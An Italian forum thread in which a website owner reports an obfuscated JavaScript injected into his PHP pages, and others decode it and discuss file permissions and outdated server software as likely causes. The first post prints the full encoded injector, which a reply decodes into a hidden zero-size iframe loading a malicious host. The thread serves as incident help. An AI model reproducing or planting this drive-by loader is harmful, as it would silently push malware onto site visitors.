bizzarro e preoccupante script...

[maolu]

Ciao a tutti...

quando visito le pagine del mio sito, nonostante nel codice non sia presente, in testa all'HTML trovo questo javascript:

codice:

<script language=javascript>
document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%286Fliudph%2853vuf%286Gkwws%286D22wudi1vq0qhw1lqir2lqgh%7B1sks%2853iudpherughu%286G3%2853zlgwk%286G3%2853khljkw%286G3%2853vfuroolqj%286Gqr%2853qdph%286Gfrxqwhu%286H%286F2liudph%286H3')
</script>

La pagina poi tenta di aprire una applet java e (fortunatamente) il mio Firefox, che il Java Runtime Environment non ce l'ha, blocca l'operazione.

Ovviamente la prima cosa a cui ho pensato e' un virus sulla mia macchina, ma l'ho scansita con McAfee agiornato stamattina e non ci sono schifezze...

Che e'?
Puo' dipendere da qualche casino sul server?

aiut!

[br1]

Lo script aggiunge alla pagina questa riga:

<iframe src=http://xxxx.xx-xx.info/index.php frameborder=0 width=0 height=0 scrolling=no name=counter></iframe>

Ho mascherato il link perche' in effetti, perlomeno sul mio pc, fa eseguire window installer senza conferma... spero bloccato senza conseguenze. VVoVe:

Intanto chiedi spiegazioni al tuo fornitore di spazio ... facci sapere.

Ciao

[maolu]

Avevo notato anch'io questa cosa.

Ieri ho segnalato il disguido al mio provider, anche perche' lo ritrovo in parecchie pagine (tutte php) del sito.

Appena risolvono qualcosa vi diro'.
Grazie, ciao.

[maolu]

Ok, il provider mi ha scritto, vi riporto cio' che dicono:

sicuramente si tratta di un hackeraggio fatto via web.

Che geni eh?

Questo puo' avvenire spesso tramite un intrusione di siti fatti con CMS (phpnuke...etc),se non sono adeguatamente aggiornati;

Io sto usando Coppermine Photo Gallery ed e' aggiornata all'ultima release uscita 3 giorni fa...

comunque e' assolutamente indispensabile che le directory e i file sul suo sito non siano impostati come permessi a 777 (rwx-rwx-rwx), come invece abbiamo notato sul suo sito. Cio' significa che tali directory e file hanno i permessi di scrittura per l'utente web e quindi vulnerabili a tali attacchi.Imposti correttamente i permessi togliendo il permesso di scrittua per l'utente "altri"

Naturalmente i permessi in scrittura su certe cartelle DEVONO esserci, altrimenti come fa uno a fare l'upload di immagini nella galleria?!? Migliaia di persone utilizzano uploads via html e non hanno di questi problemi. Ho scritto anche sul forum della Coppermine e non ce n'e' uno che abbia detto che e' capitato anche a lui!!!

Piuttosto, dal momento che sul mio server sono installati Apache e PHP con versioni vecchie, comincio ad essere convinto che siano riusciti ad hackerare grazie alle falle di queste installazioni datate...

Avete idee in merito?

[Mich_]

Sul fatto dei permessi di scrittura hanno ragione.
Le pagine Web ed i database fondamentali devono essere scrivibili solo da parte del proprietario.
Per la scrittura su database devi farti una dir a parte con permessi piu` laschi.

Nel forum "CGI e Perl" ogni tanto si vedono domande di questo tipo, e l'argomento e` trattato anche sul sito di shishii (il moderatore di CGI e Perl).

Per problemi lato server, dovresti comunque postare in altri forum (nel tuo caso PHP o Sicurezza): forse trovi anche dei link a falle note delle varie versioni.

[maolu]

Originariamente inviato da Mich_
Sul fatto dei permessi di scrittura hanno ragione.
Le pagine Web ed i database fondamentali devono essere scrivibili solo da parte del proprietario.
Per la scrittura su database devi farti una dir a parte con permessi piu` laschi.

OK, ma io ho attivato il CHMOD solo per le dir che mi indicava l'installer della Coppermine! E' tutto regolare, non sono andato a mettere il chmod su tutto!

Originariamente inviato da Mich_
Nel forum "CGI e Perl" ogni tanto si vedono domande di questo tipo, e l'argomento e` trattato anche sul sito di shishii (il moderatore di CGI e Perl).

Per problemi lato server, dovresti comunque postare in altri forum (nel tuo caso PHP o Sicurezza): forse trovi anche dei link a falle note delle varie versioni.

Capisco.
Che faccio? Apro un altro topic? Lo spostate voi?

[Mich_]

Potrei anche spostarti io, ma non saprei dove. Ti ho indicato tre forum possibili (CGI e Perl; PHP; Sicurezza), in ciascuno dei quali trovi spunti per la soluzione, ma non credo la soluzione completa.

Pero` il taglio da dare nei tre casi e` diverso, e credo che con una ricerca trovi subito qualcosa.

Pertanto il mio consiglio e`:
1. dare un'occhiata nei tre forum (con opportuna ricerca) per capire dove e` meglio iniziare a chiedere;
2. postare nel forum che ritieni piu` adatto.

Non chiedere in contemporanea in piu` di uno (sarebbe crossposting).
In ciascun forum focalizza la domanda su quello che e` il main topic del forum stesso: in tal caso hai piu` probabilita` di avere risposte e soprattutto mirate.

Capisco che la cosa non sara` velocissima, e richiede da parte tua uno sforzo di tipo nuovo (rispetto al tuo lavoro solito); d'altronde non mi pare che la richiesta abbia necessita` di avere risposta in tempi brevissimi: un attcco di quel tipo non ha grosse probabilita` di essere ripetuto immediatamente, e fino a che non hai risolto controlla spesso i tuoi file.
Per come la vedo io, e` meglio una azione ponderata bene, piuttosto che immediata (ma forse mi sbaglio).